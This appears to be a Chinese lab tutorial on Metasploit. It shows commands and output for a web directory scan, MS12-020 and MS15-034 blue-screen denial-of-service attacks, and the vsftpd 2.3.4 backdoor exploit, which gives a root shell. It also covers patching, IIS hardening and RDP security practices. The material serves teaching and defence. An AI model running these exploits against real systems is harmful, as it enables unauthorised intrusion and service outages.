MSF辅助模块Auxiliary【linux网站目录扫描,rdp死亡之蓝】,Exploit【vsftpd笑脸漏洞】应用,CVE-2015-1635漏洞攻防实战,【rdp远程桌面,vsftpd软件】扩展

MSF辅助模块Auxiliary

1、网站目录扫描(Linux靶机)

第一步:查找辅助脚本,使用辅助脚本
msf6 > search dir_scan//搜索dir_scan脚本
msf6 > use 0                       //使用编号为0的脚本
msf6 > set rhosts 192.168.10.143 //设置攻击目标
msf6 > run                         //运行脚本  
  [] Detecting error code
  [] Using code '404' as not found for 192.168.10.143
  [+] Found http://192.168.10.143:80/cgi-bin/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/doc/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/icons/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/index/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/phpMyAdmin/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/test/ 404 (192.168.10.143)        

第二步:验证网站目录

在物理机浏览器访问:  http://192.168.10.143/doc/            

2、DOS攻击(Windows靶机)

1)MS12-020 远程桌面漏洞-死亡之蓝

CVE-2012-0002(MS12-020)漏洞,利用Windows系统的远程桌面协议(RDP)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏

 

msf6 > search  ms12-020          //搜索ms12-020脚本
Matching Modules
================
   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

  一个是ID为0  有一个关键词scanner ,发扫描的脚本
  一个是ID为1  有一个关键词dos  ,是拒绝服务攻击的脚本

msf6 > use 1                   //使用DOS攻击脚本    
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.129        //设置攻击目标
msf6 auxiliary(scanner/rdp/ms12_020_check) > run                              //攻击

2)防御MS12-020漏洞

安装补丁Windows6.1-KB2621440-x64.msu

MSF辅助模块Exploit

CVE-2011-2523 vsftpd 2.3.4 后门漏洞(笑脸漏洞),此漏洞允许以root身份执行任意命令

msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.10.143
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run 
[*] 192.168.10.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.143:21 - USER: 331 Please specify the password.
[+] 192.168.10.143:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.Command shell session 1 opened (0.0.0.0:0 -> 192.168.10.143:6200)    //侵入成功
  whoami                 //显示当前用户
  root
  pwd                    //查看当前目录
  /root

 

CVE-2015-1635漏洞攻防实战

CVE-2015-1635(MS15-034)漏洞存在于HTTP协议堆栈(HTTP.sys)中,攻击者只要发送恶意http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃

补丁文件:Windows6.1-KB3042553-x64

1)漏洞扫描(OpenVAS报告)
2)用poc脚本去验证漏洞真实存在

1)上传 cve-2015-1635.poc 到kali 系统

C:\Users\Administrator>scp -r C:\\Users\Administrator\OneDrive\桌面\cve-2015-1635.poc kali@192.168.10.224:/tmp/
kali@192.168.10.224's password:
cve-2015-1635.poc                                                                     100%  912   114.2KB/s   00:00

2)修改cve-2015-1635.poc 文件中的 ipaddr 为 win2k8 地址

  **ipAddr = "192.168.10.142"**

3)开始验证

[root@kali ~] # python2  cve-2015-1635.poc        //执行POC验证脚本
[*] Audit Started                 //审计开始
[!!] Looks VULN                   //看起来很脆弱(vulnerable)

3)MSF漏洞利用,DOS攻击服务器蓝屏

msf6 > search  ms15-034  
msf6 > use 0 
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.129
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
 //检查W2K8 主机是否蓝屏  

4)对IIS安全加固:关闭内核缓存

  1. 打开IIS管理器。
  2. 在连接树中,找到并选择你想要配置的网站。
  3. 在特性视图中,双击“输出缓存”。
  4. 在“操作”面板中,点击“编辑特性”。
  5. 取消选中“启用内核缓存”选项。
  6. 点击“应用”保存更改。

5)MSF漏洞利用,服务器不再蓝屏,成功防御了攻击
6)把内核缓存在开启(内核缓存可加快网站性能)
7)对系统进行加固:安装系统补丁
8)用POC脚本测试,发现提示目标服务器补丁已修复
9)MSF漏洞利用,发现目标服务器不在蓝屏

 

RDP的工作原理

RDP基于客户端/服务器模型工作。在这种模型中,远程桌面客户端连接到运行RDP服务器软件的远程计算机。数据交换经过加密,确保了传输过程中的安全性和隐私保护。

  • 客户端:任何请求连接的设备,需要安装RDP客户端软件。Windows系统自带远程桌面连接客户端,而其他操作系统(如macOS、Linux、iOS和Android)可以使用第三方客户端。
  • 服务器:被远程访问的计算机,需要配置并运行RDP服务器端。在Windows操作系统中,这通常意味着启用"远程桌面"功能。

主要特性

  • 图形界面传输:RDP提供了高效的图形界面数据压缩和传输机制,确保远程会话流畅。
  • 设备重定向:允许远程会话使用本地打印机、剪贴板、硬盘驱动器等资源。
  • 端口和安全性:默认情况下,RDP使用TCP端口3389。所有RDP会话数据都可以加密,减少安全风险。
  • 会话隔离:每个远程桌面会话都在其独立的虚拟会话中运行,不会影响其他用户的会话。

安全性和最佳实践

虽然RDP提供了便利的远程访问能力,但它也可能成为攻击者的目标。遵循一些最佳实践可以增强RDP会话的安全性:

  • 使用强密码:确保所有用户账户都使用强密码。
  • 更改默认端口:更改RDP的默认监听端口(3389),减少自动扫描的风险。
  • 限制访问:通过防火墙规则限制可以访问RDP服务的IP地址。
  • 启用网络级别认证(NLA):NLA为RDP会话提供了一个额外的认证层次,在会话建立之前进行。
  • 使用VPN:通过VPN连接访问RDP服务,增加一层网络安全保护。
  • 定期打补丁和更新:确保操作系统和RDP软件定期更新,以保护免受已知漏洞的攻击。

 vsftpd

vsftpd(Very Secure FTP Daemon,非常安全的FTP守护进程)是一款以安全为设计重点的FTP服务器软件,主要运行在Unix和类Unix操作系统上。它因其高性能、稳定性和尤其是对安全性的重视而广受好评。这里有一些关键点,让你对vsftpd有一个全面的了解:

主要特性

  • 安全性vsftpd提供了强大的安全特性,包括对SSL/TLS的支持,这使得通过vsftpd传输的数据可以进行加密,有效防止数据在传输过程中被截取或窃听。
  • 性能:即使在处理大量并发连接的情况下,vsftpd也能保持良好的性能,这使其成为高流量网站和服务的理想选择。
  • 简易配置:尽管vsftpd提供了丰富的配置选项,以满足不同用户的需求,但其默认配置已经足够安全,对新手友好,同时也为经验丰富的管理员提供了灵活的配置可能。
  • 广泛的应用vsftpd支持标准FTP协议,这意味着它可以与各种FTP客户端软件兼容,无论是命令行工具还是图形界面应用。

安装和配置

vsftpd可以通过大多数Unix和Linux发行版的包管理系统轻松安装。安装完成后,主要的配置工作是通过编辑其配置文件/etc/vsftpd/vsftpd.conf来进行,其中可以设置匿名访问、用户权限、加密选项等多种参数。

 

  • 20
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值